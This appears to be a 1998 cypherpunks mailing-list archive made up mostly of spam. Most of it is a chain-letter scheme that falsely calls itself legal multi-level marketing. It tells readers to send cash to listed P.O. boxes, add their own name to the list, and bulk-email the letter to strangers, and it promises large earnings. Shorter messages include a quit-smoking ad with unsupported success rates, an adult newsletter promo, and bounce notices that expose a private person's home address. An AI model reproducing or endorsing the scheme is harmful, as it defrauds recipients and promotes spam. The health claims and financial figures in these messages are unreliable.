There's very little to lose, but alot to gain.  Besides making alittle extra cash each week, its fun to wonder how much money will be in your mailbox each day.  I wish all of you could know the feeling I get each day after work as I go to my p.o. box.  Its exhilerating!
Just read over the letter below.  It will make starting a breeze.
Hope to hear from you soon.
                                                                            
                         ---------------------------------------------------
----------------------------------------------------------------------------
---------------------------

My advice to you is that you save this letter (or print it) for a time.  The idea is very simple, but it definitely takes a few times reading it over before it sinks in.   I am confident that if you read over this letter briefly once now, and once again whenever you get the chance,  you will begin to see the potential involved.
Most people do not respond to this letter immediately.  Take as much time as you need to let the idea fly around in your head alittle.
This is not a pyramid scheme.   Many people equate this program with illegal schemes that involve nothing but the transferring of cash.  The difference between a legitimate multi-level marketing program and a pyramid scheme is that in a pyramid, there is no money being exchanged for a legitimate product.  The law states this clearly.  Anyone who claims this program is illegal is misinformed in the area of retail law.
In this program, the product is a  financial report that you can simply e-mail to someone  after they order it from you and send cash to you through the mail.   While the report can be sent easily to yout customers with the click of one button through e-mail, it is nonetheless a legitamate product which people choose to send you $5.00 to purchase from you.
The other legal issue that most people ask about in programs such as this one  is the issue of tax legality.  The law is clear that all income must be reported to the government each year.  When customers send you cash, it is your responsibility to keep track of how much you are making and report this at the end of the year.

Following is a simple explanation of the system and simple instructions for you to follow to get started right away:
1)	you save this letter onto your computer in case you need it later
2)	you send $5.00 to each of the 4 people listed below to order a report
3)	each of those 4 people will e-mail you 1 report immediately
4)	you save these 4 reports onto your computer
5)	you go back to this original letter and move everyone's name down 1 level, removing the               person in the 4th position and putting your name and address in the 1st position
6)	you have this newly altered letter e-mailed to tens of thousands of people  (usually people pay a bulk e-mailer to do this for them to start)
7)	when people receive this letter you sent them, they will see your name and address as the 1st report slot and will send you a $5.00 order for it
8)	when people order these reports, from you, you immediately e-mail it  to them (they will give you their e-mail address along with their $5.00)

Thats it folks......its that simple......the $5 is yours!

You e-mail them the report by "copying" it out of the saved e-mail report you received from the person on the list in this letter, and "pasting" it into a new e-mail letter and sending it off....no problem.  After you get the hang of it, you can copy many letters into new e-mails very fast and send off many orders quickly.
The reason it works is that everyone involved has an incentive to help everyone else succeed.  The people you order the reports from will e-mail the reports to you immediately because they will profit when you profit.
Each of the 4 people you order from also will be eager to answer any questions you may have and help you in any way they can so that you can start mailing copies of this letter out with their names on it along with yours.
I mentioned above that success in this system can be guaranteed based on simple statistical facts.   When you send out tens of thousands of advertisements (or pay someone to mail them out for you), you can be absolutely positively assured that a certain percentage will respond and send you $5.00 for the report.  The next fact is that the larger the mailing you have sent out, the more responses you will get.

Please understand this about this program:  It only takes an extremely small percentage of people to respond to your ad in order for you to make a profit.   This is because your advertisement (with your address or P.O. box on it) will be sent to such incredibly large amounts of people.  (A bulk e-mailer can send your letter out to thousands of people per hour.)


OVERVIEW OF OUR  ELECTRONIC MULTI-LEVEL MARKETING PROGRAM:


Basically, this is what we do:  We sell thousands of people a product for $5.00 that costs us next to nothing to produce and e-mail.  As with all multi-level businesses, we build  our business by recruiting new partners and selling our products.  Every state in the U.S. allows you to recruit new multi- level business online (with your computer).
Look at multi-million companies such as New Vision (a vitamin supplier).  We use the exact same method of multi-level selling they use.  The only difference is that our product is a financial report you can easily e-mail to someone, rather than costly vitamins.
The product in this program is a series of four businesses and financial reports.  Each $5.00 order you receive by regular  mail will include the e-mail address of the sender.  To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!...the $5.00 is yours!   It really is THAT simple!   Think about it..........


FOLLOW THE INSTRUCTIONS EXACTLY
The profits are worth it.
So go for it.  Remember the 4 points and we'll see you at the top.


******* I  N  S  T  R  U  C  T  I  O  N  S *******
This is what you must do:


1................  Save this letter onto your computer

2................ Order all 4 reports listed and numbered from the list below.
(For each report send $5.00 and your e-mail address on a piece of paper to each person listed.  When you order, make sure you  print your e-mail address clearly, and also be sure to request each SPECIFIC report.  You will need all four reports, because you will be saving them onto your computer and reselling them.)

(You will receive the reports a few days later by e-mail.  Save them onto your computer)

3................  Now you have 4 financial reports saved on your computer.  These are  legitimate products that people will want to buy.  You are ready to start advertising  your product to tens of thousands  of potential customers.
4................  Take this letter and move everyone's name and address down 1 position.  The person in the 4th position gets erased.  Put your own name (make up a company name) and address (could be a home or PO box) in position 1.

At this point you have 2 options.  If you decide you want to advertise yourself, you need to obtain mailing lists and send this newly altered letter to as many people as you can to get people to order the report from you for $5. This method can be time consuming and costly.
The second option is to pay a bulk e-mailer to mail out your letter for you.  They can send out your letter to tens of thousands of people for a fraction of the cost of the above method. This is the method we recommend and is by far the simplest and cheapest way to go.
When you use a bulk e-mailer, all you need to do is give them a copy of the original letter with the address you want your $5 orders to go to and they will do the rest.   If you are able to find a bulk e-mailer who is already involved with the program, they won't even need the original letter since they will already have it.
There are many bulk e-mailers out there who will send out your letter for you.  You can find them by doing a search of the word "bulk e-mailer" on the internet.   There are many excellent companies out there who will mail for you, but you still must be a little wary.  We have found that some companies don't send them out in a productive manner (w/out using fresh addresses or attaching other messages to yours)  and since there is no sure way to know exactly their methods, you're left wondering.

The best of all scenarios is to have someone who is also involved in this program mail out your letters for you.  There are many private bulk e-mailers out there who send out this very letter with their names on the list because they know the potential involved.  There is a good chance that one of the people you will be ordering your report from will be able to bulk e-mail out your letter for you.
When you order the report from the people on the list in this letter, they will e-mail you a report---if they bulk e-mail, they will probably include an offer to send your letters out for you.
There is a simple reason why it is best to have someone involved in the program bulk e-mail out your letters for you.  As mentioned before, it is difficult to verify that a company is sending out your letter in the most profitable way.  If the person sending out the letter is also involved in the program, they will understand the program and, best of all, they will do everything possible to see you get as many responses as possible because when you profit they will profit as well since they are on the list as well.  This gives the person an incentive to take great care in sending out your mail since they have alot to gain from it as well as you.  Other bulk e-mailing companies will not have this same incentive.


ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!!

----------------------------------------------------------------------------
----------------------------------------------------------------------------
--

REQUIRED REPORTS


***Order each REPORT by NUMBER and NAME***
Following is the list of people you will send $5 to:
(Remember to include your e-mail address on the paper concealing the 5 dollars)
When they e-mail the report to you, save them onto your computer.


----------------------------------------------------------------------------
----------------------------------------------------------------------------


REPORT #1
"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"
ORDER REPORT #1 FROM:
RB Enterprises
P.O.Box 2341
Falls Church VA 22042

 
----------------------------------------------------------------------------
----------------------------------------------------------------------------
--
REPORT #2
"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"
ORDER REPORT #2 FROM:
API
P.O.Box 44275
Eden Praire.MN 55344



----------------------------------------------------------------------------
----------------------------------------------------------------------------
--
REPORT #3
"SOURCES FOR THE BEST MAILING LISTS"
ORDER REPORT #3 FROM:
PCC
P.O.Box 3535
Margate, NJ 08402
----------------------------------------------------------------------------
---
REPORT #4
"Multi Level Marketing Intelligence Report"
ORDER REPORT #4 From:

AlaLink
P.O. Box 311907
Enterprise AL 36331-1907
 
----------------------------------------------------------------------------
----------------------------------------------------------------------------
--
Here's the fun part:
Take a look at what is called the "multiplier effect" in marketing:


Let's say you decide to start small just to see how it goes.  Assume you advertise your letter until 10 people respond and send you $5.00.  Also assume that those 10 people also advertise until they get 10 people to order and send them $5.00.
Assume this continues for everyone in your downline and observe the following results:
* 10 people order report #1 from you and send you $5.00

5  * 10 =  $50
* each of those 10 people advertise until 10 people order report #1 from them (since their mailing will have your name  as #2, 100 people will also send you $5 each to order report #2)

5  *  100=  $500
* each of those 500 people advertise until 10 people order report #1 from them (1000 people order report #3 from you  and send you $5)

5  *  1000=  $5,000
* each of those 1000 people advertise until 10 people order report #1 from them

(10,000 people order report #4 from you and send you $5)
5  *  10,000=  $50,000


$50,000  +  $5,000  +  $500  +  $50
Total =  $55,550

A bulk e-mailer can send your letter out to thousands of people in one night.  The above scenario holds true if only 10 people out of those thousands respond.  This program is a study in statistics.  A certain percentage WILL respond and send you $5.
There is no guarante that you will make $50,000 each time, but its nice just to have some help with the rent or to have a few bills taken care of each month. This program is fun to be a part of. We hope to hear from you soon!"















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: franghjk@skynet.be
Date: Tue, 8 Dec 1998 01:02:56 -0800 (PST)
To: franghjk@dfn.de
Subject: ATTENTION SMOKERS STOP SMOKING IMMEDIATELY
Message-ID: <m0znIN2-001QMrC@cristal.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


             BE A NON-SMOKER IN 7 DAYS!!!  WITH KICK-IT
          

                   *Kick-It Works 96% of the Time!          

                   *Supresses your craving for smoking, AND Eating!
              
                   *Significant Smoking Reduction in just 48 hours!

                   *Your system detoxified & Nicotine-Free in 7 days!

                   *The Patch Works Only 22% of the Time
           
                   *The Gum Works Only 6% Of The Time

                   *A percentage of each sale Donated To Project DARE!                                            
                                                                                                                     
click on the link below to learn more about Kick-It

 http://www.freeyellow.com/members6/nocig/  


 



To be removed from our mailing list click whitehores7@Hotmail.com and place remove in the subject






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Tue, 22 Sep 1998 12:03:17 -0700 (PDT)
To: (STUFFED TUESDAY SEPTEMBER 22 1998)
Subject: Oh boy, some goodies today. Porn starr on our payroll/Spice girls go 69
Message-ID: <19980922071000.13745.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


What's better than 10 free sexy pics a day? 30 free sexy pics a day. Stuffed has the pics, 
stories and nutty sexy news! It doesn't get any better than this, come on take a peek we dare you!

IN TODAY'S ISSUE:

 SPURED LOVER SPREADS PIX!
  HOW TO BAG A BAR BABE
   THE BEST OF EUREKA
    NEW KIT LETS TEENAGE GIRLS CREATE IMAGINARY BOYFRIENDS
     MORE FUN WITH MS WORD
      LEWINSKY'S GOT THE BLUES IN ROME
       SURVEY - MOST FOLKS ONLY READ SEXY PARTS OF THE STARR REPORT
        SEX WITH CINDY-CRAWFORD
   
       ---->   http://stuffed.net/98/9/22/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/22/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Administrator<Postmaster@Iguanodon.big-orange.net>
Date: Mon, 21 Sep 1998 23:03:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Mail System Error - Returned Mail
Message-ID: <19980922060250.AAB28281@Iguanodon.big-orange.net>
MIME-Version: 1.0
Content-Type: text/plain

This Message was undeliverable due to the following reason:

The following destination addresses were unknown (please check
the addresses and re-mail the message):

SMTP <rinus@nox.nl>

Please reply to Postmaster@Iguanodon.big-orange.net
if you feel this message to be in error.




Reporting-MTA: dns; Iguanodon.big-orange.net
Received-From-MTA: dns; [165.87.194.252] [165.87.194.252]
Arrival-Date: Tue, 22 Sep 1998 08:02:49 +0200


To: rinus@nox.nl
Subject: zonnebril
From: Lefty Cyberslasher <cypherpunks@toad.com>
Date: Tue, 22 Sep 1998 11:00:45 +0500

hobbies=Hobbies are Star Trek, computers and surfing the internet. 
age=35 years old
adres=Irfan Mansoor Ali
110 Hasanabad Block "e"
North Nazimabad Karachi 74700
Pakistan














react=Dont u give away free Oil of Olayz?
:)Take Care and Send me my glasses fast





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Administrator<Postmaster@Iguanodon.big-orange.net>
Date: Mon, 21 Sep 1998 23:12:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Mail System Error - Returned Mail
Message-ID: <19980922061153.AAB28454@Iguanodon.big-orange.net>
MIME-Version: 1.0
Content-Type: text/plain

This Message was undeliverable due to the following reason:

The following destination addresses were unknown (please check
the addresses and re-mail the message):

SMTP <rinus@nox.nl>

Please reply to Postmaster@Iguanodon.big-orange.net
if you feel this message to be in error.




Reporting-MTA: dns; Iguanodon.big-orange.net
Received-From-MTA: dns; [165.87.194.252] [165.87.194.252]
Arrival-Date: Tue, 22 Sep 1998 08:11:50 +0200


To: rinus@nox.nl
Subject: zonnebril
From: Lefty Cyberslasher <cypherpunks@toad.com>
Date: Tue, 22 Sep 1998 11:10:03 +0500

hobbies=Hobbies are Star Trek, computers and surfing the internet. 
age=35 years old
adres=Irfan Mansoor Ali
110 Hasanabad Block "e"
North Nazimabad Karachi 74700
Pakistan














react=Dont u give away free Oil of Olayz?
:)Take Care and Send me my glasses fast





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 22 Sep 1998 10:16:58 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 22, 1998
Message-ID: <199809221711.MAA12560@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713805.multipart/mixed"

--Boundary..3996.1071713805.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

Your company just formed a partnership in a country 
you never heard of.  Are you worried about international 
roaming fraud?  You should be.

CTIA's Wireless Security '98 - It's Just Smart Business
ORLANDO, FLORIDA  NOVEMBER 9 - 11, 1998 
http://www.wow-com.com/professional/ 

Team WOW-COM
wowcom@ctia.org
===========================================
 





--Boundary..3996.1071713805.multipart/mixed
Content-Type: application/octet-stream; name="bin00022.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00022.bin"
Content-Description: "_CTIA_Daily_News_19980922.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8QlI+Jm5ic3A7CjxDRU5URVI+PFRB
QkxFIEJPUkRFUj0wIENPTFM9MiBXSURUSD0iNjAwIiA+CjxUUj4KPFREPjxB
IEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPjxJTUcgU1JDPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL2ltYWdlcy9ob21laGVkX3Rlc3QuZ2lmIiBB
TFQ9IldPVy1DT00uQ09NIiBOT1NBVkUgQk9SREVSPTAgSEVJR0hUPTg5IFdJ
RFRIPTI3NT48L0E+PC9URD4KCjxURD4KPENFTlRFUj48QSBIUkVGPSJodHRw
Oi8vd3d3LmlsbHVtaW5ldFNTNy5jb20vd2lyZWxlc3Mvd2ludW1wb3IuaHRt
Ij48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFnZXMvYWRz
L2lsbHVtaW5ldF9udW1wb3J0LmdpZiIgQUxUPSJUb2RheSdzIE5ld3MgU3Bv
bnNvcmVkIGJ5IElsbHVtaW5ldCIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD03
NSBXSURUSD0xNzUgQUxJR049QUJTQk9UVE9NPjwvQT48L0NFTlRFUj4KPC9U
RD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9D
RU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9MCBXSURUSD0iNjAwIiA+
CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBDT0xPUj0iI0NDQ0ND
QyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09N
IC0gU2VwdGVtYmVyIDIyLCAxOTk4PC9GT05UPjwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0rMT5RVUFMQ09NTSdzICdwZFEnIE1vYmlsZQpEZXZp
Y2U8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+UVVBTENPTU0gaW50cm9kdWNlZCBpdHMgbmV3ZXN0IGNyZWF0aW9uLAp0
aGUgJ3BkUScgU21hcnQgUGhvbmUgd2hpY2ggY29tYmluZXMgYSBkaWdpdGFs
IHBob25lIGFuZCBQYWxtUGlsb3QuJm5ic3A7Cig8QSBIUkVGPSJodHRwOi8v
d3d3LndpcmVkLmNvbS9uZXdzL25ld3MvYnVzaW5lc3Mvc3RvcnkvMTUxMjQu
aHRtbCI+V0lSRUQ8L0E+KQooPEEgSFJFRj0iaHR0cDovL3d3dy5uZXdzLmNv
bS9OZXdzL0l0ZW0vVGV4dG9ubHkvMCwyNSwyNjY0NCwwMC5odG1sP3BmdiI+
TkVXUy5DT008L0E+KQooPEEgSFJFRj0iaHR0cDovL2RhaWx5bmV3cy55YWhv
by5jb20vaGVhZGxpbmVzL3RlY2hub2xvZ3kvemRuZXQvc3RvcnkuaHRtbD9z
PW4vcGNfd2Vlay90ZWNobm9sb2d5LzE5OTgwOTIxLzE5OTgwOTIxNTA3Ij5Z
QUhPTzwvQT4pJm5ic3A7PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPk5vcnRlbCBTaHV0cyBEb3duIENl
bGx1bGFyClRlbGVwaG9uZSBQbGFudDwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5Ob3J0ZWwgY2xvc2VzIGl0cyBjZWxs
dWxhciB0ZWxlcGhvbmUgcGxhbnQKaW4gc291dGh3ZXN0IEVuZ2xhbmQgdG8g
Y29uY2VudHJhdGUgb24gbmV3IGdyb3d0aCBtYXJrZXRzIGluIHRoZSBDYXJp
YmJlYW4KYW5kIFNvdXRoIEFtZXJpY2EuJm5ic3A7ICg8QSBIUkVGPSJodHRw
Oi8vd3d3Lm5hbmRvdGltZXMuY29tL25ld3Nyb29tL250bi9iaXovMDkyMTk4
L2JpejE2XzU3MDYuaHRtbCI+TkFORE88L0E+KQooPEEgSFJFRj0iaHR0cDov
L3d3dy50ZWNod2ViLmNvbS93aXJlL3N0b3J5L1RXQjE5OTgwOTIxUzAwMDYi
PlRFQ0hXRUI8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5Nb3Rvcm9sYSBBbm5vdW5jZXMgSW50
ZW50CnRvIERlcGxveSBFeGNlbCBTd2l0Y2hpbmcgUGxhdGZvcm0gaW4gV2ly
ZWxlc3MgTG9jYWwgTG9vcCBBcHBsaWNhdGlvbnM8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+TW90b3JvbGEsIEluYy4n
cyBDZWxsdWxhciBJbmZyYXN0cnVjdHVyZQpHcm91cCAoQ0lHKSB0b2RheSBh
bm5vdW5jZWQgaXQgaW50ZW5kcyB0byBwdXJjaGFzZSBhbmQgZGVwbG95IEV4
Y2VsIFN3aXRjaGluZwpDb3Jwb3JhdGlvbidzIEVYUyh0bSkgaW5mcmFzdHJ1
Y3R1cmUgc3dpdGNoaW5nIHBsYXRmb3JtIGFzIGEgTmV0d29yayBJbnRlcmZh
Y2UKVW5pdCAoTklVKSBpbiBzZWxlY3RlZCB3aXJlbGVzcyBsb2NhbCBsb29w
IG1hcmtldHMgd29ybGR3aWRlLiAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhv
by5jb20vYncvOTgwOTIxL2V4Y2VsXzEuaHRtbCI+WUFIT088L0E+KTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0rMT5TZWxlY3RpbmcgVGhlIFJpZ2h0IFBob25lCkZvciBIb21lIE9yIE9m
ZmljZSBJcyBOb3QgRWFzeTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj5BIHBob25lIGlzIGVzc2VudGlhbCB0byB0aGUg
c3VjY2VzcyBvZgphbnkgaG9tZS1vZmZpY2Ugb3Igc21hbGwtb2ZmaWNlIHdv
cmtlci4mbmJzcDsgKDxBIEhSRUY9Imh0dHA6Ly93d3cuZGFsbGFzbmV3cy5j
b20vdGVjaG5vbG9neS1uZi90ZWNoYml6NjUuaHRtIj5EQUxMQVMKTkVXUzwv
QT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPSsxPkNlbGxTdGFyIFNoYXJlcyBQbHVuZ2U8L0ZPTlQ+PC9G
T05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+Q2VsbFN0YXIs
IGEgbWFqb3Igd2hvbGVzYWxlIGRpc3RyaWJ1dG9yCm9mIHdpcmVsZXNzIGhh
bmRzZXRzIGZvciBtYW51ZmFjdHVyZXJzLCBkb2VzIG5vdCBleHBlY3QgdG8g
bWVldCBpdHMgZm9yZWNhc3RlZApwcm9maXQgYnkgZW5kIG9mIHRoZSB5ZWFy
LiZuYnNwOyAoPEEgSFJFRj0iaHR0cDovL3d3dy50ZWNod2ViLmNvbS9pbnZl
c3Rvci9zdG9yeS9JTlYxOTk4MDkyMVMwMDA1Ij5URUNIV0VCPC9BPikKKDxB
IEhSRUY9Imh0dHA6Ly93d3cuZGFsbGFzbmV3cy5jb20vYnVzaW5lc3MtbmYv
Yml6NTIuaHRtIj5EQUxMQVMgTkVXUzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkVuc2VtYmxl
IENvbW11bmljYXRpb25zClNldCBUbyBVbnZlaWwgTmV3IEFwcHJvYWNoIFRv
IFdpcmVsZXNzIElQPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPkNvbXBhbnkncyAiYWRhcHRpdmUgSVAiIHdpbGwgZGVs
aXZlciBJbnRlcm5ldApQcm90b2NvbC1iYXNlZCBzZXJ2aWNlcyBvdmVyIHdp
cmVsZXNzIGJyb2FkYmFuZCBuZXR3b3Jrcy4mbmJzcDsgKDxBIEhSRUY9Imh0
dHA6Ly93d3cuemRuZXQuY29tL2ludHdlZWsvZGFpbHkvOTgwOTIxZC5odG1s
Ij5aRE5FVDwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkdTTSBUZWNobm9sb2d5IENvbm5lY3Rz
Ck1vYmlsZSBXb3JrIEZvcmNlPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPkdsb2JhbCBTeXN0ZW0gZm9yIE1vYmlsZSBD
b21tdW5pY2F0aW9ucwpwcm92aWRlcyBhIHdvcmxkd2lkZSBjb25uZWN0aW9u
IGZvciBhIG1vYmlsZSB3b3JrIGZvcmNlLiBJdCdzIHdpZGVseSB1c2VkCmlu
IEV1cm9wZSBhbmQgQXNpYSBhbmQgd2lsbCBiZSByZWFkaWx5IGF2YWlsYWJs
ZSBpbiB0aGUgVW5pdGVkIFN0YXRlcyBieQp5ZWFyJ3MgZW5kLiAoPEEgSFJF
Rj0iaHR0cDovL3d3dy50ZWNod2ViLmNvbS9zZS9kaXJlY3RsaW5rLmNnaT9J
V0sxOTk4MDkyMVMwMDQ4Ij5URUNIV0VCPC9BPik8L0ZPTlQ+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+WTJLIEJ1
ZyBXaWxsIEJpdGUgQmVmb3JlClllYXIgMjAwMDwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5BbHRob3VnaCB0aGUgWWVh
ciAyMDAwIGlzIGNsb3NlciB0aGFuCndlIG1heSB0aGluaywgdGhlICdtaWxs
ZW5uaXVtIGJ1ZycgY291bGQgcG9zc2libHkgYml0ZSBhcyBzb29uIGFzIEph
bnVhcnkKMTk5OS4mbmJzcDsgKDxBIEhSRUY9Imh0dHA6Ly93d3cubXNuYmMu
Y29tL25ld3MvMTk4MjU5LmFzcCI+TVNOQkM8L0E+KTwvRk9OVD48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5KUCBT
eXN0ZW1zJyBCZWFtTGluawpBbGxvd3MgVmlydHVhbCBSZWFsLVRpbWUgV2ly
ZWxlc3MgTWVzc2FnaW5nIEJldHdlZW4gUGFsbSBDb21wdXRpbmcgRGV2aWNl
cwphbmQgU2t5VGVsJ3MgQWNjZXNzTGluayBJSSBUd28tV2F5IFBhZ2VyPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkpQ
IFN5c3RlbXMgSW5jLiwgYSBsZWFkaW5nIGdsb2JhbCBzb2Z0d2FyZQpkZXZl
bG9wZXIsIHRvZGF5IGFubm91bmNlZCB0aGUgYXZhaWxhYmlsaXR5IG9mIGl0
cyBmbGFnc2hpcCBzb2Z0d2FyZSwgQmVhbUxpbmsodG0pLAphIHdpcmVsZXNz
LW1lc3NhZ2luZyBwcm9kdWN0IGZvciBQYWxtUGlsb3QodG0pIGFuZCBQYWxt
